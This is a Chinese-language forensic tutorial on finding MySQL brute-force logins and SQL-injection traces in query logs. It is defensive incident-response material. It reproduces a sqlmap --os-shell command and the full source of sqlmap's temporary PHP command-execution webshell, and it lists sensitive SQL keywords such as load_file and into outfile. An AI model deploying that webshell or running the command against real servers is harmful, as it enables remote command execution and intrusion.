文章來源：知了堂馮老師

常見的數(shù)據(jù)庫攻擊包括弱口令、SQL注入、提升權(quán)限、竊取備份等。對數(shù)據(jù)庫日志進行分析，可以發(fā)現(xiàn)攻擊行為，進一步還原攻擊場景及追溯攻擊源。

0x01 Mysql日志分析

general query log能記錄成功連接和每次執(zhí)行的查詢，我們可以將它用作安全布防的一部分，為故障分析或黑客事件后的調(diào)查提供依據(jù)。

1、查看log配置信息 show variables like '%general%'; 2、開啟日志 SET GLOBAL general_log = 'On'; 3、指定日志文件路徑 #SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';

比如，當(dāng)我訪問 /test.php?id=1，此時我們得到這樣的日志：

190604 14:46:14 ? ? ? 14 Connect ? ?root@localhost on ? ? ? ? ? 14 Init DB ? ?test ? ? ? ? ? 14 Query ? ?SELECT * FROM admin WHERE id = 1 ? ? ? ? ? 14 Quit ?`

我們按列來解析一下：

第一列:Time，時間列，前面一個是日期,后面一個是小時和分鐘，有一些不顯示的原因是因為這些sql語句幾乎是同時執(zhí)行的,所以就不另外記錄時間了。 第二列:Id，就是show processlist出來的第一列的線程ID,對于長連接和一些比較耗時的sql語句,你可以精確找出究竟是那一條那一個線程在運行。 第三列:Command，操作類型，比如Connect就是連接數(shù)據(jù)庫，Query就是查詢數(shù)據(jù)庫(增刪查改都顯示為查詢)，可以特定過慮一些操作。 第四列:Argument，詳細信息，例如 Connect ? ?root@localhost on 意思就是連接數(shù)據(jù)庫，如此類推,接下面的連上數(shù)據(jù)庫之后,做了什么查詢的操作。

0x02 登錄成功/失敗

我們來做個簡單的測試吧，使用我以前自己開發(fā)的弱口令工具來掃一下，字典設(shè)置比較小，2個用戶，4個密碼，共8組。

MySQL中的log記錄是這樣子：

Time ? ? ? ? ? ? ? ? Id ? ? ? ?Command ? ? ? ? Argument 190601 22:03:20 ? ?98 Connect ? root@192.168.204.1 on ? ? ? ? ? 98 Connect ? Access denied for user 'root'@'192.168.204.1' (using password: YES) ? ? ? ? ?103 Connect ? mysql@192.168.204.1 on ? ? ? ? ?103 Connect ? Access denied for user 'mysql'@'192.168.204.1' (using password: YES) ? ? ? ? ?104 Connect ? mysql@192.168.204.1 on ? ? ? ? ?104 Connect ? Access denied for user 'mysql'@'192.168.204.1' (using password: YES) ? ? ? ? ?100 Connect ? root@192.168.204.1 on ? ? ? ? ?101 Connect ? root@192.168.204.1 on ? ? ? ? ?101 Connect ? Access denied for user 'root'@'192.168.204.1' (using password: YES) ? ? ? ? ? 99 Connect ? root@192.168.204.1 on ? ? ? ? ? 99 Connect ? Access denied for user 'root'@'192.168.204.1' (using password: YES) ? ? ? ? ?105 Connect ? mysql@192.168.204.1 on ? ? ? ? ?105 Connect ? Access denied for user 'mysql'@'192.168.204.1' (using password: YES) ? ? ? ? ?100 Query set autocommit=0 ? ? ? ? ?102 Connect ? mysql@192.168.204.1 on ? ? ? ? ?102 Connect ? Access denied for user 'mysql'@'192.168.204.1' (using password: YES) ? ? ? ? ?100 Quit ?`

你知道在這個口令猜解過程中，哪個是成功的嗎？

利用爆破工具，一個口令猜解成功的記錄是這樣子的：

190601 22:03:20 ? ? 100 Connect root@192.168.204.1 on ? ? ? 100 Query ? ?set autocommit=0 ? ? ? 100 Quit

但是，如果你是用其他方式，可能會有一點點不一樣的哦。

Navicat for MySQL登錄：

190601 22:14:07 ? 106 Connect ? root@192.168.204.1 on ? ? ? ? ? ? ? ? 106 Query ?SET NAMES utf8 ? ? ? ? ? ? ? ? 106 Query ?SHOW VARIABLES LIKE 'lower_case_%' ? ? ? ? ? ? ? ? 106 Query ?SHOW VARIABLES LIKE 'profiling' ? ? ? ? ? ? ? ? 106 Query ?SHOW DATABASES

命令行登錄：

190601 22:17:25 ? 111 Connect ? root@localhost on ? ? ? ? ? ? ? ? 111 Query ?select @@version_comment limit 1 190601 22:17:56 ? 111 Quit

這個差別在于，不同的數(shù)據(jù)庫連接工具，它在連接數(shù)據(jù)庫初始化的過程中是不同的。通過這樣的差別，我們可以簡單判斷出用戶是通過連接數(shù)據(jù)庫的方式。

另外，不管你是爆破工具、Navicat for MySQL、還是命令行，登錄失敗都是一樣的記錄。

登錄失敗的記錄：

102 Connect mysql@192.168.204.1 on 102 Connect Access denied for user 'mysql'@'192.168.204.1' (using password: YES)

利用shell命令進行簡單的分析：

#有哪些IP在爆破？ grep ?"Access denied" mysql.log |cut -d "'" -f4|uniq -c|sort -nr ? ? 27 192.168.204.1 #爆破用戶名字典都有哪些？ grep ?"Access denied" mysql.log |cut -d "'" -f2|uniq -c|sort -nr ? ? 13 mysql ? ? 12 root ? ? ?1 root ? ? ?1 mysql

在日志分析中，特別需要注意一些敏感的操作行為，比如刪表、備庫，讀寫文件等。關(guān)鍵詞：drop table、drop function、lock tables、unlock tables、load_file() 、into outfile、into dumpfile。

敏感數(shù)據(jù)庫表：SELECT * from mysql.user、SELECT * from mysql.func

0x03 SQL注入入侵痕跡

在利用SQL注入漏洞的過程中，我們會嘗試利用sqlmap的--os-shell參數(shù)取得shell，如操作不慎，可能留下一些sqlmap創(chuàng)建的臨時表和自定義函數(shù)。我們先來看一下sqlmap os-shell參數(shù)的用法以及原理：

1、構(gòu)造一個SQL注入點，開啟Burp監(jiān)聽8080端口

sqlmap.py -u http://192.168.204.164/sql.php?id=1 --os-shell --proxy=http://127.0.0.1:8080

HTTP通訊過程如下：

創(chuàng)建了一個臨時文件tmpbwyov.php，通過訪問這個木馬執(zhí)行系統(tǒng)命令，并返回到頁面展示。

tmpbwyov.php：

<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>`

創(chuàng)建了一個臨時表sqlmapoutput，調(diào)用存儲過程執(zhí)行系統(tǒng)命令將數(shù)據(jù)寫入臨時表，然后取臨時表中的數(shù)據(jù)展示到前端。

通過查看網(wǎng)站目錄中最近新建的可疑文件，可以判斷是否發(fā)生過sql注入漏洞攻擊事件。

檢查方法：

1、檢查網(wǎng)站目錄下，是否存在一些木馬文件：

2、檢查是否有UDF提權(quán)、MOF提權(quán)痕跡

檢查目錄是否有異常文件

mysql\lib\plugin

c:/windows/system32/wbem/mof/

檢查函數(shù)是否刪除

select * from mysql.func

3、結(jié)合web日志分析。

本周就先更新到這兒哦，下周繼續(xù)，請一定關(guān)注我們噢！